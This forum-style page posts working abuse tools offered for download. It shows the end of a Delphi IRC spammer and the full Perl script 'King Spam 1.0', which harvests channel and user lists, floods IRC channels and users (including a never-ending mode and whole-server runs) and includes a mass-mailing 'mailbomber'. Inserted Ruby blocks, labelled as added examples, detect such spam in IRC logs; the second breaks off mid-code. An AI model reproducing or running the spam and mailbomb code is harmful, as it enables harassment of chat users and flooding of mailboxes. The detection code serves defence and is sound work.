    procedure Button11Click(Sender: TObject);
    procedure Button6Click(Sender: TObject);
    procedure FormCreate(Sender: TObject);

  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;
  buscando_usuarios: string;
  buscando_canales: string;
  control_guardar_canales: string;
  control_guardar_users: string;

implementation

{$R *.dfm}
// Functions

procedure savefile(filename, texto: string);
var
  ar: TextFile;

begin

  AssignFile(ar, filename);
  FileMode := fmOpenWrite;

  if FileExists(filename) then
    Append(ar)
  else
    Rewrite(ar);

  Write(ar, texto + sLineBreak);
  CloseFile(ar);

end;

procedure TForm1.Button11Click(Sender: TObject);
begin
  StatusBar1.Panels[0].Text := '[+] Finished';
  StatusBar1.Update;
  IdIRC1.Disconnect;
  spam_usuarios.Enabled := false;
end;

procedure TForm1.Button1Click(Sender: TObject);
var
  i: integer;
  contenido: TStringList;
  stream: TFileStream;
begin

  file_spam.Clear;

  if OpenDialog1.Execute then
  begin

    spam.Text := OpenDialog1.filename;

    contenido := TStringList.Create;
    stream := TFileStream.Create((OpenDialog1.filename), fmShareDenyNone);
    contenido.LoadFromStream(stream);

    for i := 0 to contenido.Count - 1 do
    begin
      file_spam.Items.Add(contenido[i]);
    end;
  end;

end;

procedure TForm1.Button2Click(Sender: TObject);
var
  seleccion: integer;
begin

  canales.Items.Clear;

  buscando_canales := 'yes';

  seleccion := MessageDlg('Save Channels', mtInformation, mbYesNo, 0);
  if seleccion = mrYes then
  begin
    control_guardar_canales := 'yes';
  end;

  StatusBar1.Panels[0].Text := '[+] Searching channels ...';
  StatusBar1.Update;

  // IdIRC1.Disconnect;

  IdIRC1.Nickname := nombre.Text;
  IdIRC1.AltNickname := nombre.Text + '123';
  IdIRC1.Username := nombre.Text;
  IdIRC1.RealName := nombre.Text;
  IdIRC1.Password := '';
  IdIRC1.host := host.Text;

  try
    begin
      IdIRC1.Connect;
      IdIRC1.Raw('LIST');
    end;
  except
    begin
      ShowMessage('Error connecting');
    end;
  end;

  if (FileExists(GetCurrentDir + '/logs/' + host.Text + '_canales.txt')) then
  begin
    ShellExecute(Handle, 'open', Pchar(GetCurrentDir + '/logs/' + host.Text +
      '_canales.txt'), nil, nil, SW_SHOWNORMAL);
  end;

end;

procedure TForm1.Button3Click(Sender: TObject);
var
  seleccion: integer;
begin

  users.Items.Clear;

  buscando_usuarios := 'yes';

  seleccion := MessageDlg('Save users', mtInformation, mbYesNo, 0);
  if seleccion = mrYes then
  begin
    control_guardar_users := 'yes';
  end;

  StatusBar1.Panels[0].Text := '[+] Searching users ...';
  StatusBar1.Update;

  // IdIRC1.Disconnect;

  IdIRC1.Nickname := nombre.Text;
  IdIRC1.AltNickname := nombre.Text + '123';
  IdIRC1.Username := nombre.Text;
  IdIRC1.RealName := nombre.Text;
  IdIRC1.Password := '';
  IdIRC1.host := host.Text;

  try
    begin
      IdIRC1.Connect;
      IdIRC1.Join(canal.Text);
    end;
  except
    begin
      ShowMessage('Error connecting');
    end;
  end;

  if (FileExists(GetCurrentDir + '/logs/' + canal.Text + '_usuarios.txt')) then
  begin
    ShellExecute(Handle, 'open', Pchar(GetCurrentDir + '/logs/' + canal.Text +
      '_usuarios.txt'), nil, nil, SW_SHOWNORMAL);
  end;

end;

procedure TForm1.Button4Click(Sender: TObject);
begin
  lista_canales.Items.Add(canal_agregar.Text);
end;

procedure TForm1.Button5Click(Sender: TObject);
var
  i: integer;
  canal_z: string;
begin

  StatusBar1.Panels[0].Text := '[+] Spamming channel ...';
  StatusBar1.Update;

  console1.Clear;
  try
    begin
      IdIRC1.Nickname := nombre.Text;
      IdIRC1.AltNickname := nombre.Text + '123';
      IdIRC1.Username := nombre.Text;
      IdIRC1.RealName := nombre.Text;
      IdIRC1.Password := '';
      IdIRC1.host := host.Text;
      IdIRC1.Connect;

      for i := 0 to lista_canales.Count - 1 do
      begin
        canal_z := lista_canales.Items[i];
        IdIRC1.Join(canal_z);
        console1.Lines.Add('[+] Spam in channel : ' + canal_z);
        IdIRC1.Say(canal_z, file_spam.Items[Random(file_spam.Count - 1) + 0]);
        Sleep(2000);
        IdIRC1.Part(canal_z);
        Sleep(2000);
      end;
    end;
  except
    ShowMessage('Error connecting');
  end;

  IdIRC1.Disconnect;

  StatusBar1.Panels[0].Text := '[+] Finished';
  StatusBar1.Update;

end;

procedure TForm1.Button6Click(Sender: TObject);
begin
  StatusBar1.Panels[0].Text := '[+] Spamming users ...';
  StatusBar1.Update;

  IdIRC1.Nickname := nombre.Text;
  IdIRC1.AltNickname := nombre.Text + '123';
  IdIRC1.Username := nombre.Text;
  IdIRC1.RealName := nombre.Text;
  IdIRC1.Password := '';
  IdIRC1.host := host.Text;

  try
    begin
      IdIRC1.Connect;
      IdIRC1.Join(canal_spam_usuarios.Text);
      spam_usuarios.Interval := 10000;
      spam_usuarios.Enabled := true;
    end;
  except
    begin
      ShowMessage('Error connecting');
    end;
  end;
end;

procedure TForm1.FormCreate(Sender: TObject);
begin

  if not DirectoryExists('logs') then
  begin
    CreateDir('logs');
  end;

  OpenDialog1.InitialDir := GetCurrentDir;

end;

procedure TForm1.IdIRC1Raw(ASender: TIdContext; AIn: Boolean;
  const AMessage: string);
var
  code: string;
  regex: TPerlRegEx;
  otroregex: TPerlRegEx;
  canales_encontrados: string;
  control: TPerlRegEx;
  otrocontrol: TPerlRegEx;
  i: integer;
  i2: integer;
  renicks: string;
  listanow: TStringList;
  arraynow: array of String;

begin
  code := AMessage;

  regex := TPerlRegEx.Create();
  otroregex := TPerlRegEx.Create();

  // console1.Lines.Add(code);

  regex.regex := '322 (.*?) (.*?) (.*?) :';
  regex.Subject := code;

  if regex.Match then
  begin
    canales_encontrados := regex.Groups[2];
    canales.Items.Add(canales_encontrados);
    if (control_guardar_canales = 'yes') then
    begin
      savefile('logs/' + host.Text + '_canales.txt', canales_encontrados);
    end;
  end;

  otroregex.regex := '353 (.*) = #(.*) :(.*)';
  otroregex.Subject := code;

  if otroregex.Match then
  begin

    renicks := otroregex.Groups[3];

    renicks := StringReplace(renicks, nombre.Text, '', []);

    listanow := TStringList.Create;
    listanow.Delimiter := ' ';
    listanow.DelimitedText := renicks;

    for i2 := 0 to listanow.Count - 1 do
    begin
      users.Items.Add(listanow[i2]);
      if (control_guardar_users = 'yes') then
      begin
        savefile('logs/' + canal.Text + '_usuarios.txt', listanow[i2]);
      end;
    end;
  end;

  control := TPerlRegEx.Create();
  control.regex := 'End of /LIST';
  control.Subject := code;
  if control.Match then
  begin
    if (buscando_canales = 'yes') then
    begin
      ShowMessage('Channels Loaded');
      StatusBar1.Panels[0].Text := '[+] Channels Found';
      StatusBar1.Update;
      regex.Free;
      IdIRC1.Disconnect;
      IdIRC1.Destroy;
      buscando_canales := 'no';
    end;
  end;

  otrocontrol := TPerlRegEx.Create();
  otrocontrol.regex := 'End of /NAMES';
  otrocontrol.Subject := code;
  if otrocontrol.Match then
  begin
    if (buscando_usuarios = 'yes') then
    begin
      ShowMessage('Users Loaded');
      StatusBar1.Panels[0].Text := '[+] Users Found';
      StatusBar1.Update;
      otrocontrol.Free;
      IdIRC1.Part(canal.Text);
      IdIRC1.Disconnect;
      IdIRC1.Destroy();
      buscando_usuarios := 'no';
    end;
  end;

end;

procedure TForm1.L1Click(Sender: TObject);
var
  i: integer;
  contenido: TStringList;
  stream: TFileStream;
begin

  if OpenDialog1.Execute then
  begin
    contenido := TStringList.Create;
    stream := TFileStream.Create((OpenDialog1.filename), fmShareDenyNone);
    contenido.LoadFromStream(stream);

    for i := 0 to contenido.Count - 1 do
    begin
      lista_canales.Items.Add(contenido[i]);
    end;
  end;

end;

procedure TForm1.R1Click(Sender: TObject);
begin
  lista_canales.Clear;
end;

procedure TForm1.spam_usuariosTimer(Sender: TObject);
var
  i: integer;
begin

  for i := 0 to users.Count - 1 do
  begin

    StatusBar1.Panels[0].Text := '[+] Spamming to ' + users.Items[i];
    StatusBar1.Update;

    console2.Lines.Add('[+] Spamming to ' + users.Items[i]);

    IdIRC1.Say(users.Items[i],
      file_spam.Items[Random(file_spam.Count - 1) + 0]);

  end;

end;

end.

// The End ?


If you want to download it, you can do so here
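On the server or channel-operator side, the behaviour coded above leaves two recognisable traces: one nick joining a channel, sending a single message and parting again within seconds, and the same text sent to many distinct targets in a short window. The Ruby block below is an added example, not part of the original post; the timestamped traffic is constructed, and the line format, window and limits are assumptions of this example.

```ruby
# Constructed server-side IRC traffic: epoch seconds, then the raw line.
SAMPLE_IRC = <<~IRC
  1432311780 :bot77!bot77@198.51.100.9 JOIN #ruby
  1432311781 :bot77!bot77@198.51.100.9 PRIVMSG #ruby :visit example.invalid
  1432311783 :bot77!bot77@198.51.100.9 PART #ruby
  1432311785 :bot77!bot77@198.51.100.9 JOIN #perl
  1432311786 :bot77!bot77@198.51.100.9 PRIVMSG #perl :visit example.invalid
  1432311788 :bot77!bot77@198.51.100.9 PART #perl
  1432311790 :bot77!bot77@198.51.100.9 JOIN #delphi
  1432311791 :bot77!bot77@198.51.100.9 PRIVMSG #delphi :visit example.invalid
  1432311793 :bot77!bot77@198.51.100.9 PRIVMSG alice :visit example.invalid
  1432311793 :bot77!bot77@198.51.100.9 PRIVMSG bob :visit example.invalid
  1432311700 :carol!carol@203.0.113.5 JOIN #ruby
  1432311760 :carol!carol@203.0.113.5 PRIVMSG #ruby :anyone using Tk on 2.2?
  1432311795 :carol!carol@203.0.113.5 PRIVMSG #ruby :thanks
IRC

IRC_RE = /\A(\d+) :([^!\s]+)!\S+ (JOIN|PART|PRIVMSG) :?(\S+)(?: :(.*))?\z/

def parse_irc(line)
  m = IRC_RE.match(line) or return nil
  { ts: m[1].to_i, nick: m[2], cmd: m[3], target: m[4], text: m[5] }
end

# Largest number of distinct targets that received the same text within
# `window` seconds.
def max_fanout(msgs, window)
  per_text = msgs.group_by { |e| e[:text] }.values.map do |same|
    same.each_index.map do |i|
      same.drop(i).take_while { |e| e[:ts] - same[i][:ts] <= window }
          .map { |e| e[:target] }.uniq.size
    end.max
  end
  per_text.max || 0
end

# Channels the nick joined and left again within `window` seconds.
def churned_channels(events, window)
  joined = {}
  events.each_with_object([]) do |e, out|
    case e[:cmd]
    when "JOIN"
      joined[e[:target]] = e[:ts]
    when "PART"
      since = joined.delete(e[:target])
      out << e[:target] if since && e[:ts] - since <= window
    end
  end
end

# Flags a nick when either signal reaches its limit.
def detect_irc_spam(log, window: 30, fanout_limit: 4, churn_limit: 2)
  per_nick = Hash.new { |h, k| h[k] = [] }
  log.each_line do |line|
    e = parse_irc(line.chomp)
    per_nick[e[:nick]] << e if e
  end

  flagged = per_nick.map do |nick, events|
    events.sort_by! { |e| e[:ts] }
    fanout  = max_fanout(events.select { |e| e[:cmd] == "PRIVMSG" }, window)
    churned = churned_channels(events, window)
    next if fanout < fanout_limit && churned.size < churn_limit
    { nick: nick, fanout: fanout, churned: churned }
  end
  flagged.compact
end

if __FILE__ == $PROGRAM_NAME
  detect_irc_spam(SAMPLE_IRC).each do |f|
    puts "#{f[:nick]}: same text to #{f[:fanout]} targets, join/part churn in #{f[:churned].join(', ')}"
  end
end
```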
#60
Scripting / [Perl] King Spam 1.0
15 May 2015, 18:25 PM
A simple Perl script for spamming IRC channels and e-mail accounts.

It has the following options:

  • Spam a channel normally or forever
  • Spam an entire server
  • Spam a list of servers and all their channels
  • Choose a nick for the bot and a timeout
  • Spam e-mail accounts

The code:

Code (perl):

    #!usr/bin/perl
    #King Spam 1.0
    #(C) Doddy Hackman 2015
    # SMTP Servers
    #smtp.gmail.com - 465
    #smtp.mail.yahoo.com -587

    use IO::Socket;
    use Color::Output;
    Color::Output::Init;
    use Getopt::Long;

    #use Win32::OLE;

    my $nick_secundario    = "Cl4ptr4p";
    my $timeout_secundario = "5";

    GetOptions(
        "get_channels=s"         => \$get_channels,
        "get_users=s"            => \$get_users,
        "spam_channel=s"         => \$spam_channel,
        "spam_channel_forever=s" => \$spam_channel_forever,
        "spam_server=s"          => \$spam_server,
        "spam_servers_file=s"    => \$spam_servers_file,
        "spam_targets=s"         => \$spam_targets,
        "spam_file=s"            => \$spam_file,
        "channel=s"              => \$channel,
        "port=s"                 => \$port,
        "nick=s"                 => \$nick,
        "savefile=s"             => \$file,
        "timeout=s"              => \$timeout,
        "mailbomber"             => \$mailbomber
    );

    head();

    if ($get_channels) {

        my $port_now = "";
        my $nick_now = "";
        my $file_now = "";

        if ( !$port ) {
            $port_now = "6667";
        }
        else {
            $port_now = $port;
        }

        if ( !$nick ) {
            $nick_now = $nick_secundario;
        }
        else {
            $nick_now = $nick;
        }

        if ( !$file ) {
            $file_now = "";
        }
        else {
            $file_now = $file;
        }

        listar_canales( $get_channels, $port_now, $nick_now, $file_now );

    }
    elsif ($get_users) {

        my $port_now = "";
        my $nick_now = "";
        my $file_now = "";

        if ( !$port ) {
            $port_now = "6667";
        }
        else {
            $port_now = $port;
        }

        if ( !$nick ) {
            $nick_now = $nick_secundario;
        }
        else {
            $nick_now = $nick;
        }

        printear_titulo("[+] Serching users ...\n\n");

        my @usuarios =
          buscar_usuarios( $get_users, $port_now, $nick_now, $channel );

        if ( int(@usuarios) eq "0" ) {
            printear("[-] Users not found\n");
        }
        else {
            printear("[+] Users Found : ");
            print int(@usuarios) . "\n\n";
            for my $usuario (@usuarios) {
                printear("[+] User : ");
                print $usuario. "\n";
                savefile( $file, $usuario );
            }
        }

    }
    elsif ($spam_channel) {

        my $port_now    = "";
        my $nick_now    = "";
        my $timeout_now = "";

        if ( !$port ) {
            $port_now = "6667";
        }
        else {
            $port_now = $port;
        }

        if ( !$nick ) {
            $nick_now = $nick_secundario;
        }
        else {
            $nick_now = $nick;
        }

        if ( !$timeout ) {
            $timeout_now = $timeout_secundario;
        }
        else {
            $timeout_now = $timeout;
        }

        spam_canal(
            $spam_channel, $port_now,  $nick_now,
            $channel,      $spam_file, $timeout_now
        );

    }
    elsif ($spam_channel_forever) {

        my $port_now    = "";
        my $nick_now    = "";
        my $timeout_now = "";

        if ( !$port ) {
            $port_now = "6667";
        }
        else {
            $port_now = $port;
        }

        if ( !$nick ) {
            $nick_now = $nick_secundario;
        }
        else {
            $nick_now = $nick;
        }

        if ( !$timeout ) {
            $timeout_now = $timeout_secundario;
        }
        else {
            $timeout_now = $timeout;
        }

        spam_canal_forever( $spam_channel_forever, $port_now, $nick_now,
            $channel, $spam_file, $timeout_now );

    }
    elsif ($spam_server) {

        my $port_now    = "";
        my $nick_now    = "";
        my $timeout_now = "";

        if ( !$port ) {
            $port_now = "6667";
        }
        else {
            $port_now = $port;
        }

        if ( !$nick ) {
            $nick_now = $nick_secundario;
        }
        else {
            $nick_now = $nick;
        }

        if ( !$timeout ) {
            $timeout_now = $timeout_secundario;
        }
        else {
            $timeout_now = $timeout;
        }

        my @encontrados = buscar_canales( $spam_server, $port_now, $nick_now );

        for my $encontrado (@encontrados) {
            if ( $encontrado =~ /(.*)-soy_un_limite-(.*)/ ) {
                my $canal    = $1;
                my $cantidad = $2;

                spam_canal( $spam_server, $port_now, $nick_now, $canal, $spam_file,
                    $timeout_now );

            }
        }

    }
    elsif ($spam_servers_file) {

        my $port_now    = "";
        my $nick_now    = "";
        my $timeout_now = "";

        if ( !$port ) {
            $port_now = "6667";
        }
        else {
            $port_now = $port;
        }

        if ( !$nick ) {
            $nick_now = $nick_secundario;
        }
        else {
            $nick_now = $nick;
        }

        if ( !$timeout ) {
            $timeout_now = $timeout_secundario;
        }
        else {
            $timeout_now = $timeout;
        }

        unless ( -f $spam_servers_file ) {
            printear("[-] File not found\n\n");
            copyright();
        }
        else {

            my @lista = loadfile($spam_servers_file);

            printear("[+] Servers Found : ");
            print int(@lista) . "\n";

            printear_titulo(
                "\n-------------------------------------------------------------\n"
            );

            for my $spam_server (@lista) {
                chomp $spam_server;
                my @encontrados =
                  buscar_canales( $spam_server, $port_now, $nick_now );

                for my $encontrado (@encontrados) {
                    chomp $encontrado;
                    if ( $encontrado =~ /(.*)-soy_un_limite-(.*)/ ) {
                        my $canal    = $1;
                        my $cantidad = $2;

                        spam_canal( $spam_server, $port_now, $nick_now, $canal,
                            $spam_file, $timeout_now );
                        printear_titulo(
    "\n-------------------------------------------------------------\n"
                        );
                    }
                }
            }
        }

    }
    elsif ($spam_targets) {

        my $port_now    = "";
        my $nick_now    = "";
        my $timeout_now = "";

        if ( !$port ) {
            $port_now = "6667";
        }
        else {
            $port_now = $port;
        }

        if ( !$nick ) {
            $nick_now = $nick_secundario;
        }
        else {
            $nick_now = $nick;
        }

        if ( !$timeout ) {
            $timeout_now = $timeout_secundario;
        }
        else {
            $timeout_now = $timeout;
        }

        if ( -f $spam_targets ) {

            my @datos = loadfile($spam_targets);

            printear("[+] Servers Found : ");
            print int(@datos) . "\n";

            printear_titulo(
                "\n-------------------------------------------------------------\n"
            );

            for my $dato (@datos) {
                chomp $dato;
                if ( $dato =~ /(.*) --- (.*)/ ) {
                    my $server = $1;
                    my $canal  = $2;

                    spam_canal( $server, $port_now, $nick_now, $canal, $spam_file,
                        $timeout_now );
                    printear_titulo(
    "\n-------------------------------------------------------------\n"
                    );

                }
            }

        }
        else {
            printear("\n[-] File not Found\n\n");
            copyright();
        }

    }
    elsif ($mailbomber) {

        printear_titulo("[+] Spam Mails : OK\n\n\n");

        printear("[+] Host : ");
        chomp( my $host = <stdin> );

        printear("\n[+] Port : ");
        chomp( my $puerto = <stdin> );

        printear("\n[+] Username : ");
        chomp( my $username = <stdin> );

        printear("\n[+] Password : ");
        chomp( my $password = <stdin> );

        printear("\n[+] Count Message : ");
        chomp( my $count = <stdin> );

        printear("\n[+] To : ");
        chomp( my $to = <stdin> );

        printear("\n[+] Subject : ");
        chomp( my $asunto = <stdin> );

        printear("\n[+] Body : ");
        chomp( my $body = <stdin> );

        printear("\n[+] File to Send : ");
        chomp( my $file = <stdin> );

        printear_titulo("\n[+] Starting ...\n\n");

        for my $num ( 1 .. $count ) {
            printear("[+] Sending Message : ");
            print "$num\n";
            sendmail(
                $host,     $puerto, $username, $password, $username, $username,
                $username, $to,     $asunto,   $body,     $file
            );
        }

        printear_titulo("\n[+] Finished\n");

    }
    else {
        sintax();
    }

    copyright();

    # Functions

    sub spam_canal {

        my $hostname = $_[0];
        my $port     = $_[1];
        my $nombre   = $_[2];
        my $canal    = $_[3];
        my $archivo  = $_[4];

        printear("[+] Connecting to ");
        print $hostname. "\n\n";

        my @nicks    = buscar_usuarios( $_[0], $_[1], $_[2], $_[3] );
        my $contador = 0;
        my $termine  = 0;
        my $timeout  = $_[5];

        my @spamnow = loadfile($archivo);

        if (
            my $socket = new IO::Socket::INET(
                PeerAddr => $hostname,
                PeerPort => $port,
                Proto    => "tcp"
            )
          )
        {

            print $socket "NICK $nombre\r\n";
            print $socket "USER $nombre 1 1 1 1\r\n";
            print $socket "JOIN $canal\r\n";

            printear_titulo("[+] Users Found : ");
            print int(@nicks) . "\n\n";

            while ( my $log = <$socket> ) {
                chomp $log;

                if ( $log =~ /^PING(.*)$/i ) {
                    print $socket "PONG $1\r\n";
                }

                if ( $contador eq "0" ) {
                    printear("[+] Spam in channel : ");
                    print $canal. "\n";
                    sleep($timeout);
                    print $socket "PRIVMSG $canal "
                      . $spamnow[ rand(@spamnow) ] . "\r\n";
                    $contador++;
                }

                foreach $names (@nicks) {
                    chomp $names;
                    sleep($timeout);
                    unless ( $nombre eq $names ) {
                        $names =~ s/\@//;
                        $names =~ s/\+//;
                        print $socket "PRIVMSG $names $spamnow[rand(@spamnow)]\r\n";
                        printear("[+] Spam to user $names : ");
                        print "OK\n";
                    }
                    $termine++;
                }

                if ( $termine eq int(@nicks) ) {
                    $socket->close();
                    last;
                }

            }
        }
        else {
            printear("[-] Error\n");
            $socket->close();
        }

    }

    sub spam_canal_forever {

        my $hostname = $_[0];
        my $port     = $_[1];
        my $nombre   = $_[2];
        my $canal    = $_[3];
        my $archivo  = $_[4];

        printear("[+] Connecting to ");
        print $hostname. "\n\n";

        my @nicks    = buscar_usuarios( $_[0], $_[1], $_[2], $_[3] );
        my $contador = 0;
        my $termine  = 0;
        my $timeout  = $_[5];

        my @spamnow = loadfile($archivo);

        if (
            my $socket = new IO::Socket::INET(
                PeerAddr => $hostname,
                PeerPort => $port,
                Proto    => "tcp"
            )
          )
        {

            print $socket "NICK $nombre\r\n";
            print $socket "USER $nombre 1 1 1 1\r\n";
            print $socket "JOIN $canal\r\n";

            printear_titulo("[+] Users Found : ");
            print int(@nicks) . "\n\n";

            while ( my $log = <$socket> ) {
                chomp $log;

                while (1) {
                    if ( $log =~ /^PING(.*)$/i ) {
                        print $socket "PONG $1\r\n";
                    }

                    if ( $contador eq "0" ) {
                        printear("[+] Spam in channel : ");
                        print $canal. "\n";
                        sleep($timeout);
                        print $socket "PRIVMSG $canal "
                          . $spamnow[ rand(@spamnow) ] . "\r\n";
                        $contador++;
                    }

                    foreach $names (@nicks) {
                        chomp $names;
                        sleep($timeout);
                        unless ( $nombre eq $names ) {
                            $names =~ s/\@//;
                            $names =~ s/\+//;
                            print $socket
                              "PRIVMSG $names $spamnow[rand(@spamnow)]\r\n";
                            printear("[+] Spam to user $names : ");
                            print "OK\n";
                        }
                        $termine++;
                    }
                    $contador = 0;
                    print "\n";
                }

                if ( $termine eq int(@nicks) ) {
                    $socket->close();
                    last;
                }

            }
        }
        else {
            printear("[-] Error\n");
            $socket->close();
        }

    }

    sub buscar_usuarios {

        my $hostname = $_[0];
        my $port     = $_[1];
        my $nombre   = $_[2];
        my $canal    = $_[3];

        if (
            my $socket = new IO::Socket::INET(
                PeerAddr => $hostname,
                PeerPort => $port,
                Proto    => "tcp"
            )
          )
        {

            print $socket "NICK $nombre\r\n";
            print $socket "USER $nombre 1 1 1 1\r\n";
            print $socket "JOIN $canal\r\n";

            while ( my $log = <$socket> ) {

                chomp $log;

                if ( $log =~ /^PING(.*)$/i ) {
                    print $socket "PONG $1\r\n";
                }

                if ( $log =~ m/:(.*) 353 (.*) = (.*) :(.*)/ig ) {
                    my $pro = $4;
                    chop $pro;
                    $pro =~ s/$nombre//;
                    my @nicks = split " ", $pro;
                    $socket->close();
                    return @nicks;
                }

            }
        }
    }

    sub buscar_canales {

        my @resultado;

        my $hostname = $_[0];
        my $port     = $_[1];
        my $nombre   = $_[2];

        if (
            my $socket = new IO::Socket::INET(
                PeerAddr => $hostname,
                PeerPort => $port,
                Proto    => "tcp"
            )
          )
        {

            print $socket "NICK $nombre\r\n";
            print $socket "USER $nombre 1 1 1 1\r\n";
            print $socket "LIST\r\n";

            while ( my $log = <$socket> ) {

                if ( $log =~ /322 (.*?) (.*?) (.*?) :/ ) {
                    my $canal    = $2;
                    my $cantidad = $3;
                    push( @resultado, $canal . "-soy_un_limite-" . $cantidad );
                }

                if ( $log =~ /:End of \/LIST/ ) {
                    last;
                }

            }

            $socket->close;

            return @resultado;

        }

    }

    sub listar_canales {

        my $host = $_[0];
        my $port = $_[1];
        my $nick = $_[2];
        my $file = $_[3];

        printear_titulo("[+] Searching channels ...\n\n");
        my @encontrados = buscar_canales( $host, $port, $nick );
        if ( int(@encontrados) eq "0" or int(@encontrados) eq "1" ) {
            printear_titulo("[-] Channels not found\n");
        }
        else {
            printearf_titulo( "Channels", "Users" );
            print "\n";
            for my $encontrado (@encontrados) {
                if ( $encontrado =~ /(.*)-soy_un_limite-(.*)/ ) {
                    my $canal    = $1;
                    my $cantidad = $2;
                    printearf( $canal, $cantidad );

                    if ( $file ne "" ) {
                        savefile( $file, $canal );
                    }

                }
            }
        }

    }

    sub sendmail {

    ## Function Based on : http://code.activestate.com/lists/pdk/5351/
    ## Credits : Thanks to Phillip Richcreek and Eric Promislow

        my (
            $host, $port, $username, $password, $from, $cc,
            $bcc,  $to,   $asunto,   $mensaje,  $file
        ) = @_;

        $correo = Win32::OLE->new('CDO.Message');

        $correo->Configuration->Fields->SetProperty( "Item",
            'http://schemas.microsoft.com/cdo/configuration/sendusername',
            $username );
        $correo->Configuration->Fields->SetProperty( "Item",
            'http://schemas.microsoft.com/cdo/configuration/sendpassword',
            $password );
        $correo->Configuration->Fields->SetProperty( "Item",
            'http://schemas.microsoft.com/cdo/configuration/smtpserver', $host );
        $correo->Configuration->Fields->SetProperty( "Item",
            'http://schemas.microsoft.com/cdo/configuration/smtpserverport',
            $port );
        $correo->Configuration->Fields->SetProperty( "Item",
            'http://schemas.microsoft.com/cdo/configuration/smtpusessl', 1 );
        $correo->Configuration->Fields->SetProperty( "Item",
            'http://schemas.microsoft.com/cdo/configuration/sendusing', 2 );
        $correo->Configuration->Fields->SetProperty( "Item",
            'http://schemas.microsoft.com/cdo/configuration/smtpauthenticate', 1 );
        $correo->Configuration->Fields->Update();

        if ( -f $file ) {
            $correo->AddAttachment($file);
        }

        $correo->{From}     = $from;
        $correo->{CC}       = $cc;
        $correo->{BCC}      = $bcc;
        $correo->{To}       = $to;
        $correo->{Subject}  = $asunto;
        $correo->{TextBody} = $mensaje;
        $correo->Send();

    }

    # More Functions

    sub printearf_titulo {
        cprintf( "\x0310" . "%-32s  %s" . "\x030\n", $_[0], $_[1] );
    }

    sub printearf {
        cprintf( "\x036" . "%-32s  %s" . "\x030\n", $_[0], $_[1] );
    }

    sub printear {
        cprint( "\x036" . $_[0] . "\x030" );
        return "";
    }

    sub printear_logo {
        cprint( "\x037" . $_[0] . "\x030" );
        return ""

    }

    sub printear_titulo {
        cprint( "\x0310" . $_[0] . "\x030" );
        return "";
    }

    sub savefile {
        open( SAVE, ">>" . $_[0] );
        print SAVE $_[1] . "\n";
        close SAVE;
    }

    sub loadfile {
        if ( -f $_[0] ) {
            my @words;
            my @r;
            open( FILE, $_[0] );
            @words = <FILE>;
            close FILE;
            for (@words) {
                push( @r, $_ );
            }
            return (@r);
        }
        else {
            printear("\n[-] File not found\n\n");
            copyright();
        }
    }

    sub sintax {
        printear("[+] Sintax : ");
        print "perl $0 <option> <value>\n";
        printear("\n[+] Options : \n\n");
        print
    "-get_channels <host> -port <port> -nick <nick> -savefile <file> : Get & Save Channels of a server\n";
        print
    "-get_users <host> -port <port> -channel <channel> -nick <nick> -savefile <file> : Get & Save Users of a channel\n";
        print
    "-spam_channel <host> -port <port> -channel <channel> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in a Channel\n";
        print
    "-spam_channel_forever <host> -port <port> -channel <channel> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in a Channel Forever\n";
        print
    "-spam_server <host> -port <port> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in a server\n";
        print
    "-spam_servers_list <file> -port <port> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in multiple servers\n";
        print
    "-spam_targets <file> -port <port> -nick <nick> -spam_file <spam> -timeout <timeout> : Spam in servers & channels saved\n";
        print "-mailbomber : Open MailBomber\n";
        printear("\n[+] Example : \n\n");
        print "perl kingspam.pl -get_channels localhost\n";
        print "perl kingspam.pl -get_users localhost -channel #locos\n";
        print
    "perl kingspam.pl -spam_channel localhost -channel #locos -spam_file c:/spam.txt\n";
        print
    "perl kingspam.pl -spam_channel_forever localhost -channel #locos -spam_file c:/spam.txt\n";
        print "perl kingspam.pl -spam_server localhost -spam_file c:/spam.txt\n";
        print
    "perl kingspam.pl -spam_servers_file c:/servers.txt -nick ClapTrap -spam_file c:/spam.txt\n";
        print
          "perl kingspam.pl -spam_targets c:/servers.txt -spam_file c:/spam.txt\n";
        print "perl kingspam.pl -mailbomber\n";
    }

    sub head {
        printear_logo("\n-- == KingSpam 1.0 == --\n\n\n");
    }

    sub copyright {
        printear_logo("\n\n-- == (C) Doddy Hackman 2015 == --\n\n");
        exit(1);
    }

    # The End ?


    A video with usage examples:

    [youtube=640,360]https://www.youtube.com/watch?v=TPYeDBPKRdw[/youtube]

    If you want to download the program, you can do so here:

    SourceForge.
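
Seen from the server side, the script above has a recognisable shape: one PRIVMSG to the channel, then one PRIVMSG to every nick taken from the 353 NAMES reply. The following Ruby is an added example, not part of the original post, that flags this fan-out in a message log; the log line format, the thresholds, the function name and the sample lines are all assumptions constructed here.

```ruby
# Added example (not from the original post): flag IRC senders whose
# PRIVMSG fan-out matches the pattern above.
# Assumed log format: "<epoch> <nick> PRIVMSG <target> :<text>"

FANOUT_LIMIT = 5    # distinct targets allowed per window (assumed value)
WINDOW_SECS  = 300  # sliding window in seconds (assumed value)

LINE_RE = /\A(\d+) (\S+) PRIVMSG (\S+) :(.*)\z/

# Returns { nick => [targets] } for every sender that messaged more than
# `limit` distinct targets within `window` seconds. Lines must be in
# chronological order.
def detect_fanout(lines, limit: FANOUT_LIMIT, window: WINDOW_SECS)
  recent  = Hash.new { |h, k| h[k] = [] }  # nick => [[ts, target], ...]
  flagged = {}
  lines.each do |line|
    m = LINE_RE.match(line.chomp)
    next unless m                           # skip JOIN, PING, NOTICE, ...
    ts     = m[1].to_i
    nick   = m[2].downcase                  # IRC nicks are case-insensitive
    target = m[3].downcase
    events = recent[nick]
    events << [ts, target]
    events.reject! { |t, _| t < ts - window }  # expire old events
    targets = events.map { |_, tg| tg }.uniq
    flagged[nick] = targets if targets.size > limit
  end
  flagged
end

# Constructed sample log: "bot7" joins, posts to the channel, then messages
# each member in turn; "alice" chats normally.
SAMPLE_LOG = [
  "1000 alice PRIVMSG #locos :hola",
  "1001 bot7 JOIN #locos",
  "1002 bot7 PRIVMSG #locos :visit example.invalid",
  "1005 bot7 PRIVMSG alice :visit example.invalid",
  "1008 bot7 PRIVMSG bob :visit example.invalid",
  "1010 alice PRIVMSG bob :did you get that too?",
  "1011 bot7 PRIVMSG carol :visit example.invalid",
  "1014 bot7 PRIVMSG dave :visit example.invalid",
  "1017 bot7 PRIVMSG erin :visit example.invalid",
].freeze

detect_fanout(SAMPLE_LOG).each do |nick, targets|
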